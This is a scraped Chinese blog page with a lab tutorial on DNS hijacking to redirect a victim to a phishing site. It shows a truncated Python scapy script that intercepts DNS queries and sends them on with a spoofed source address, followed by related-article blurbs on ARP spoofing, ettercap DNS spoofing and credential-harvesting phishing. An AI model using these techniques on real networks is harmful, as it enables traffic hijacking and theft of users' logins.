中级DNS劫持,做钓鱼网站。

最新推荐文章于 2024-02-22 12:00:00 发布
最新推荐文章于 2024-02-22 12:00:00 发布
阅读量867 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/haha13l4/article/details/90210275

环境:
配置一个目标网站www.wf.com
设置dns解析www.wf.com
网卡:192.168.88.2
Win7 被欺骗的 ip:192.168.88.143
Win server 2008 DNS服务器 ip:192.168.88.136
选择自己所在的网卡
在这里插入图片描述
代码如下:

from scapy.all import *
dnss="192.168.88.136"
xwlan="VMware Virtual Ethernet Adapter for VMnet8"
def task(p):
    try:
        pip=p[IP]
        pudp=p[UDP]
        pdns=p[DNS]
        if p.dport==53 and pip.dst=="192.168.88.2":  #请求包
            #192.168.88.1给假dns发包
            send(IP(src="192.168.88.1",dst=dnss,ttl=55)/UDP(sport=p.sport,dport=53)/pdns,iface=xwlan)
            mm=pip.src
            print(mm)
            print("转发查询成功",mm)
            
            #假dns发包给192.168.88.1回包
        elif p.sport==53 and pip.src==dnss:     #响应包
最低0.47元/天 解锁文章

200万优质内容无限畅学
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
【渗透应急溯源经验篇】网络安全面试
大河之犬的博客
05-17 3389
5、我们发现一个攻击(如平台登录后的SQL注入)可以通过流量回溯装置抓取那个被登录用户的用户名和密码,登录平台后自己利用发现的payload进行尝试,看是否能注入成功。如果一个数据包非常大,几个G或者一个G,我们就考虑数据包是否进行了重传,然后查看数据包的重传数,打个比方就是刷新,如果短时间重传数非常多,就为机器操作,判定为攻击。SMB,SSH,MSSQL,MySQL等协议比较多,看包的大小,成功登陆的包很大。3、确定数据流,攻击的数据流我们是要看HTTP,TCP,还是ssh。
局域网下利用dns欺骗进行钓鱼
m0_64342167的博客
02-08 3036
实验材料 kali rtl8812au 靶机一台(手机电脑皆可) 前置工作 1、首先开启流量流量转发,不然开启arp欺骗就是单纯的断网了 2、接下来再去添加你要重定向的dns,该配置文件是/etc/ettercap/etter.dns 3、最后开启一个http服务,部署你的钓鱼网站 前置工作完成后,接下来一把子梭就完事了,打开ettercap 注意这里的网卡别选错了,使用虚拟机自带的网卡转发速度非常慢,要选择无线网卡 接下来扫描添加target,当然是我们的靶机和网关啦 接.
工作记录-DNS劫持钓鱼
SmileAndFun的博客
06-02 1242
工作记录-DNS劫持钓鱼) 声明:如复现攻击,一定要把控风险,不能用于犯罪及违背道德。 一、DNS劫持概念 DNS劫持又叫域名劫持,指攻击者利用其他攻击手段 (比如劫持了路由器或域名服务器等),篡改了某个域名的解析结果,使得指向该域名的IP变成了另一个IP,导致对相应网址的访问被劫持到另一个不可达的或者假冒的网址,从而实现非法窃取用户信息或者破坏正常网络服务的目的。 二、知识要点简要 1.1 DNS劫持的是我们的域名将解析到哪一个IP地址的记录,是基于UDP协议的一种应用层协议。 1.2 这个攻击的前提是
内网安全-arp欺骗,dns劫持钓鱼
weixin_58782362的博客
11-05 1133
攻击机一直发送伪造的数据包,欺骗网关自己是靶机,欺骗靶机自己是网关,同时开启路由转发功能,就可以让靶机在正常上网的情况下截获网络数据包,所有数据都会经过攻击机再转发给靶机。攻击机伪造数据包后本应该传输给靶机的数据错误的传输给攻击机,使靶机得不到服务器的响应数据,甚至根本无法将数据包发送出局域网。在设置的规则中,记住选择有可能解析的域名,将三级域名解析成二级域名。arpspoof -i enth -t 目标 -r 网卡。dns劫持,在arp欺骗的基础上面进行劫持。使用ettercap kali自带。
内网渗透之 arp欺骗-dns劫持-网站钓鱼
orange777
02-26 5602
环境信息 攻击机kali 192.168.10.124 靶机win7 192.168.10.229 arp欺骗 用到ettercap工具 1、启动ettercap -G 2、设置嗅探网卡,如eth0 扫描存活主机 将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2 进行arp欺骗 此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功 dns劫持 1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dn
网络安全-DNS欺骗与钓鱼网站
IT之一小佬的博客
06-30 597
网络安全-DNS欺骗与钓鱼网站
DNS解析与故障排查:互联网寻址专家的绝技
本文深入探讨了DNS解析的理论基础、服务器配置与管理、故障排查技巧,以及DNS安全解析和在现代网络中的应用。首先概述了DNS的工作原理及其在现代网络中的重要性。接着,文章详细介绍了DNS服务器的搭建、配置、优化和...
【网络攻防】常见的网络攻防技术——黑客攻防(通俗易懂版)
m0_67393827的博客
07-29 3830
在世界人口近80亿的地球上,每天尚且发生数以百万计的抢劫打架斗殴事件,网络更是如此,网络攻防战几乎每时每刻都在发生。如果说打架斗殴枪击事件离我们还很远,那网络攻防战在你打开手机的时候就开始了!博主能力有限,暂不谈网络攻防具体操作实现过程,我们用通俗易懂的语言一块聊聊——神秘的“网络攻防”每当听到“网络攻防”这个名词,有没有一瞬间觉得很神秘?脑海中是否下意识的出现身穿黑色连衣帽的黑客中黑入某机构网站的场景?其实它并没有想象中的那么神秘,接下来我们一块唠唠常见的几种常见的网络攻防技术https。...
嗅探、DNS劫持配合CS钓鱼
深蓝旭的博客
02-07 336
本章节讲述的是嗅探和DNS劫持的利用嗅探:同一个局域网下,原本应该丢弃的包,被保留下来,即使不开双向欺骗Driftnet工具:Driftnet监视网络流量,抓取网络流量中的JPEG和GIF图像。这侵犯了人们的隐私,无论何时何地我们都不能这么。除此之外,它还可以从网络中提取MPEG音频数据。driftnet –i 指定网卡名称ettercap工具:选择remote-browser模块当使用这个模块的时候,被攻击目标机器访问的url都会在本地打开步骤1:ettercap –G #进入图形化界面步...
DNShack DNS欺骗工具
05-19
DNShack,用于网络攻防的dns欺骗
利用python+scapy抓取DNS数据包
01-04
程序只会抓取DNS数据包。不会去抓取其他类型的数据包!
DNS欺骗与钓鱼网站
qq_47860598的博客
04-05 792
使用kali系统模拟攻击者,利用中间人攻击手段来对受害者进行DNS欺骗、使受害者通过访问假的京东网站,来获取用户登录的用户名与密码。钓鱼往往呵社会工程学结合进行诱导,而社会工程学时黑客的内功,能否灵活运用可以体现一个黑客的个人修为,所以说防人之心不可无。如果再恨亿点,可以用*取代www.jd.com,这样无论你问什么域名攻击者都会告诉你这就是192.168.71.130。鼠标右键--->网页另存为---->保存到本地。在winxp中用域名访问jd网站(好怪,,,)
手把手教你构造简单的DNS劫持
weixin_34148456的博客
09-10 1021
2019独角兽企业重金招聘Python工程师标准>>> ...
DNS劫持实验(钓鱼网站)
n5xxxx__zy的博客
05-31 2812
实验环境: 搭建一个目标网站www.wh.com 网卡:192.168.146.2 Win7 (被欺骗的)IP:192.168.146.129 Win2008 (假DNS服务器)IP:192.168.146.130 1、网站搭建 Win2008网卡 2、执行py代码 from scapy.all import * wlan2="VMware Virtua...
Norton ConnectSafe,DNS策略防止误入钓鱼网站(Norton Security)
jerrygaoling的博客
05-05 1431
钓鱼、仿冒网站 现在的网络上,存在很多相似的网站,很容易被仿冒的钓鱼网站窃取资料或上当受骗,最近使用Norton杀毒软件的时候,偶然接触到了Norton ConnectSafe (诺顿旗下免费安全DNS服务)。 通过设置相关的DNS,可以有效的通过这一免费的服务,避免进入钓鱼网站,如若不慎点击了钓鱼网站,则会直接跳转到Norton ConnectSafe 的防护界面。 设置方法如下: ...
搭建网站实现DNS欺骗
最新发布
可惜已不在
02-22 2489
随着信息技术的飞速发展,网络搭建和服务器搭建已成为现代社会的基石。它们如同数字世界的骨架,支撑着各类应用的运行,让信息的传递和共享变得前所未有的便捷。然而,这仅仅是开始,对于真正渴望在信息技术领域探索的人们来说,学习的道路上仍有无数高峰等待我们去攀登。此刻,我们正站在一个崭新的起点,带着对知识和技术的渴望,开启一段全新的学习篇章。在这个篇章中,我们将不满足于仅仅搭建起稳固的网络和服务器,更将深入网络攻击.学习新篇章的道路或许充满挑战,但正是这些挑战,将激发我们不断前行的动力。
【KALI网络安全】DNS攻击(劫持和欺骗)与网络钓鱼的模拟和预防(1)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 5311
1、DNS概述 关于DNS的定义,作用,分类以及工作原理,我已经在【Windows Server 2019】DNS服务器的配置与管理——理论】这篇博客中陈述过。 要预防DNS劫持,必须了解它的攻击原理和过程 声明 本博客不是在向大家展示这些攻击的方法,而是让大家尽可能的了解DNS攻击的手段以及如何采取必要的预防措施,来确保更安全地上网。 2、DSN劫持DNS Hijacking)概述 2.1.什么是DNS劫持 DNS劫持全称为域名服务器劫持,又称DNS重定向(DNS redirection)。它是一种
DNS钓鱼
qq_44504968的博客
01-07 439
一.实验基础 kali(Social Engineering Tools) 物理机 二.实验步骤 1.打开Social Engineering Tools Y --> 1 --> 2 --> 3 --> 2 --> 回车 --> 输入一个网址 --> 回车 --> Y 开始监听 2.在浏览器中输入kali IP即可显示上面输入浏览器的界面 输入用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值